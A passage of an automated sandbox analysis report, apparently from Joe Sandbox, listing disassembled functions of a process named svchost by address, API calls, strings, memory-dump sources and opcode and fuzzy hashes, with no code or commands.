            • Instruction ID: 04b03bbdb53deb983333f966b4bbb29d780a53541c1f7a193331693d7eb068f9
            • Opcode Fuzzy Hash: 0a1daafbaf6965e1d57f7a53026d3bafdaada2f90dbaa08ebd26bc263fa036db
            • Instruction Fuzzy Hash: BA415672A08B8589EB03EF64D8403AC37A0FB4AB48F54C536DE4D6776ADF78A441C750
            Function 6828BA90 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: free$fputwc
            • String ID:
            • API String ID: 150244592-0
            • Opcode ID: c2c6b2484b39b49a0fcfee41523438bffa445ebd70cdf74e54fd19da28add474
            • Instruction ID: 244aee1e114e4195e8fd06e4147dcd36d29585405f5c3d7b400b3649f65df6d3
            • Opcode Fuzzy Hash: c2c6b2484b39b49a0fcfee41523438bffa445ebd70cdf74e54fd19da28add474
            • Instruction Fuzzy Hash: 691129D670815D44EE245B2AB9543BA5250AB48BE8FC8423CDE79477E8EF38C5CA8200
            Function 00007FFA4184FBB8 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ByteCharErrorLastMultiWide
            • String ID:
            • API String ID: 203985260-0
            • Opcode ID: 64999ac49b64f57510a9083063b03a6e1ec37baec4128496d2f109a880320f1d
            • Instruction ID: a55e2fdc170529db38dedee358564f5f23f5f207a37c207605f4803949a82586
            • Opcode Fuzzy Hash: 64999ac49b64f57510a9083063b03a6e1ec37baec4128496d2f109a880320f1d
            • Instruction Fuzzy Hash: B4218E72A2CB9187E3119F26E44431EB6B4F789B94F204139EB8C53B64DF3DE4458B00
            Function 68289D00 Relevance: 6.1, APIs: 4, Instructions: 51filestringCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: _errnofreefwritestrchr
            • String ID:
            • API String ID: 2662193495-0
            • Opcode ID: 3774e2090c633a3656ab33327e8cec294d0beb47fd11ff2b83d8f3812c8ee8ce
            • Instruction ID: bc084c77e099cd1f26941faf66af064652f81373628a2ae5a35925b9f4d5070e
            • Opcode Fuzzy Hash: 3774e2090c633a3656ab33327e8cec294d0beb47fd11ff2b83d8f3812c8ee8ce
            • Instruction Fuzzy Hash: DE012B96B0825801ED256A5AB9103B986416B49FE4FC843315E3D5B7D5EE28C8868740
            Function 00007FFA4184F9C4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
            Download Yara Rule
            APIs
            • GetFileInformationByHandleEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFA41850122,?,?,?,00007FFA417E1F1B), ref: 00007FFA4184F9F0
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFA41850122,?,?,?,00007FFA417E1F1B), ref: 00007FFA4184F9FE
            • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFA41850122,?,?,?,00007FFA417E1F1B), ref: 00007FFA4184FA16
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: FileHandleInformation$ErrorLast
            • String ID:
            • API String ID: 3070998852-0
            • Opcode ID: 80ee385592e1c2362f41280c714180647f26becde0ff447e63500211ae9f45ae
            • Instruction ID: 7aa2e43b8cb3c7be36dbe64016fe6ad4167529ab81b27d8e95b0855442cb23e4
            • Opcode Fuzzy Hash: 80ee385592e1c2362f41280c714180647f26becde0ff447e63500211ae9f45ae
            • Instruction Fuzzy Hash: 60015B31B1CA8285EB52EB65E48012973A0AF4ABD8F60C536DA4D87775EF3CF0458750
            Function 00007FFA41852B6C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
            • String ID:
            • API String ID: 2933794660-0
            • Opcode ID: 28632ec2a6c63f9a940f5863fbf2c4d3ea3e85bb70d54b4bccaee4de545314a5
            • Instruction ID: e7e79a1d82fc3f210508989780158d11b132ee403b51c276e50a8ea87cf88a75
            • Opcode Fuzzy Hash: 28632ec2a6c63f9a940f5863fbf2c4d3ea3e85bb70d54b4bccaee4de545314a5
            • Instruction Fuzzy Hash: 87110026B1CF0189EB41DFA0E8552B833A4F75AB68F441E35DA6D877A4EF7CE1548340
            Function 00007FFA4184FAB0 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ErrorFileHandleInformationLast
            • String ID:
            • API String ID: 275135790-0
            • Opcode ID: 89ee6a502986ecef42c32a4557c4fa67c18ab72e849ee833ed5afb4ed2bb79ab
            • Instruction ID: 608005dc378cc7afd156fd2349d1c13457dbf31ff54a9bdca53f4809a56d6871
            • Opcode Fuzzy Hash: 89ee6a502986ecef42c32a4557c4fa67c18ab72e849ee833ed5afb4ed2bb79ab
            • Instruction Fuzzy Hash: CEF0F931B1C18282FB57ABB9E46867526909F07754F244138D60E466B5FF2DF988C301
            Function 682950A0 Relevance: 6.0, APIs: 4, Instructions: 26COMMON
            Download Yara Rule
            APIs
            • __iob_func.MSVCRT ref: 682950A8
            • __iob_func.MSVCRT ref: 682950B2
            • __iob_func.MSVCRT ref: 682950D2
            • _lock.MSVCRT(?,?,00000000,6828DBF5,?,?,00000000,?,?,6828807D), ref: 682950ED
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: __iob_func$_lock
            • String ID:
            • API String ID: 3447270055-0
            • Opcode ID: 5f8b6aa296dbcfa16adabde4f11a3febc7fb30cbc54f43130410187ef3986e14
            • Instruction ID: c9c70ff51b50ac69e1b0cd2d9051c2d4f6238311e5781820710b4966752ca931
            • Opcode Fuzzy Hash: 5f8b6aa296dbcfa16adabde4f11a3febc7fb30cbc54f43130410187ef3986e14
            • Instruction Fuzzy Hash: 00E068A6B2120FC2EF2C5F33D851328A6D0EB5CB8CFD85034852D0A3C0EB28C6D48740
            Function 00007FFA4184BA50 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 231COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID: Could not copy string: buffer too small.
            • API String ID: 3668304517-4053921180
            • Opcode ID: 227f613e0afe62b09c21a363d25952e9be650c9e7fb83f0828f2b369c5476f2c
            • Instruction ID: 2e78dcb4dc9d96c85476afddbd911b2f7c096f972487162d5639ea97ad4d7f33
            • Opcode Fuzzy Hash: 227f613e0afe62b09c21a363d25952e9be650c9e7fb83f0828f2b369c5476f2c
            • Instruction Fuzzy Hash: 6F81E762B1D68555DB13EB21E8443BA7751FF96BC4F909131EA4E477A6EE3CE0858300
            Function 00007FFA417C5FE0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 153COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
            • String ID:
            • API String ID: 73155330-3916222277
            • Opcode ID: 1c9c4b0b4cec9e953c22a029d6aa9f8385a0627acb2ec8fa5e74f06502da5603
            • Instruction ID: f3bb20838242a0fb838b71fdb920c6ffb74edc6b87f4e87bea431d828777c3bd
            • Opcode Fuzzy Hash: 1c9c4b0b4cec9e953c22a029d6aa9f8385a0627acb2ec8fa5e74f06502da5603
            • Instruction Fuzzy Hash: E8514B72608B45D6EB179F2AD5942683370FB89B94F548131DB5D43BA2DF39E0A2C704
            Function 00007FFA41878F58 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ErrorFileLastWrite
            • String ID: U
            • API String ID: 442123175-4171548499
            • Opcode ID: 6af0ed221b335e21df605535339b147b91ea54c8ece773a99d8de854c7f42a7f
            • Instruction ID: 3f2e5d3649a7840daeb434224adbfdca120238a130c63409bf300b3a3cea7987
            • Opcode Fuzzy Hash: 6af0ed221b335e21df605535339b147b91ea54c8ece773a99d8de854c7f42a7f
            • Instruction Fuzzy Hash: 7141E532A2CA8186E712EF65E8447A9B7E1F799794F408132EE4D877A4EF3CE541C700
            Function 00007FFA417C6670 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
            • String ID: x338625
            • API String ID: 2371198981-2285776729
            • Opcode ID: 34fc3d2a63870931033fe23853f108ccb039bece76b25947e53ee8fce7437128
            • Instruction ID: 640effaa553348bb0da43a8cd5d8886a3cc2427a50cc3a0940a6d76ea484f514
            • Opcode Fuzzy Hash: 34fc3d2a63870931033fe23853f108ccb039bece76b25947e53ee8fce7437128
            • Instruction Fuzzy Hash: 99319362A09B4181EB17AB25D18436822A0EF55BB4F248B31DA7C467E6FF78E4D38344
            Function 00007FFA417E0AA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
            • String ID: Unknown exception
            • API String ID: 1944019136-410509341
            • Opcode ID: 73d500b531547cbb315160b61d253e83e0bea82fe788f8e6fcc6514d2b122ffc
            • Instruction ID: d385053b47f7a659c1570901b568dae8f19aad995b0d1e8944dcba8f62776a46
            • Opcode Fuzzy Hash: 73d500b531547cbb315160b61d253e83e0bea82fe788f8e6fcc6514d2b122ffc
            • Instruction Fuzzy Hash: 16418B62A1C78541EB12AF28E4407AD6361FF557A8F109331EA9C42AE6EF2CD5C1C744
            Function 00007FFA4185BB0C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: NameName::
            • String ID: %lf
            • API String ID: 1333004437-2891890143
            • Opcode ID: 76e751127dea2eba4137a203c5263995195c1acdbc4eb5f43835b70f055ce767
            • Instruction ID: 52604856b9191ab255f706e4ecc596d5b1020e96c6188a2e84a9966256883372
            • Opcode Fuzzy Hash: 76e751127dea2eba4137a203c5263995195c1acdbc4eb5f43835b70f055ce767
            • Instruction Fuzzy Hash: 1331C322A0CB4A85E713EF11A8501B97361FF67788F84C132E94E573B6DE2CF5018704
            Function 00007FFA4182FB00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
            Download Yara Rule
            APIs
            Strings
            • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 00007FFA4182FB96
            • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 00007FFA4182FB63
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: __std_exception_copy
            • String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
            • API String ID: 592178966-3345525433
            • Opcode ID: b7084373d626514a0fc402de569a2fe3cb91fd5526cf96b979924bd8ccae3c45
            • Instruction ID: f74f68c41ea76a7be0914d0987e0d0d462a779fb83d7598623fed78219068b4b
            • Opcode Fuzzy Hash: b7084373d626514a0fc402de569a2fe3cb91fd5526cf96b979924bd8ccae3c45
            • Instruction Fuzzy Hash: 3E31B022A1CA4691EB13FB20E4912A86370FF96388F90C031D68C436B6FF6CF959C740
            Function 00007FFA4185AF18 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+
            • String ID: void$void
            • API String ID: 2943138195-3746155364
            • Opcode ID: 36240e4240a944751f1086ecbeb85afa4ee21ce74374fcba9acde4ae8c411aa0
            • Instruction ID: 87c166537bd4a132a72053182b42dc0165411b3227da437dcb9fc118291dbe5e
            • Opcode Fuzzy Hash: 36240e4240a944751f1086ecbeb85afa4ee21ce74374fcba9acde4ae8c411aa0
            • Instruction Fuzzy Hash: 8B31F866E1CB5698FB03EFA5D8810EC37B0FB4A74CB448536DA4E62BA5DF38A144C750
            Function 00007FFA41853F98 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFA4184EF3E), ref: 00007FFA41853FE8
            • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFA4184EF3E), ref: 00007FFA41854029
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ExceptionFileHeaderRaise
            • String ID: csm
            • API String ID: 2573137834-1018135373
            • Opcode ID: 19efbdd19e74a68b3fc99651f207cc27c692861cb8b3d3a1476ed7770c708f0e
            • Instruction ID: a43402b140cff4f3f9fe8da33f3ac2746a2c9f5bf650fcae189afc07b64d7a39
            • Opcode Fuzzy Hash: 19efbdd19e74a68b3fc99651f207cc27c692861cb8b3d3a1476ed7770c708f0e
            • Instruction Fuzzy Hash: A1114C3261CB4082EB629F15E400259B7E0FB89B98F588235EECD47764EF3CE551C700
            Function 6828D540 Relevance: 5.0, APIs: 4, Instructions: 42COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: CriticalSection$EnterLeavefree
            • String ID:
            • API String ID: 4020351045-0
            • Opcode ID: c3d505e1fd8a5c0bca3a6f86233f4d2133910ba55e0007f052694ca8eb1c4992
            • Instruction ID: 427d4420f23fa066b7d62bae12e6d1e39bfa69356ec8b8e395a892f0f019cafb
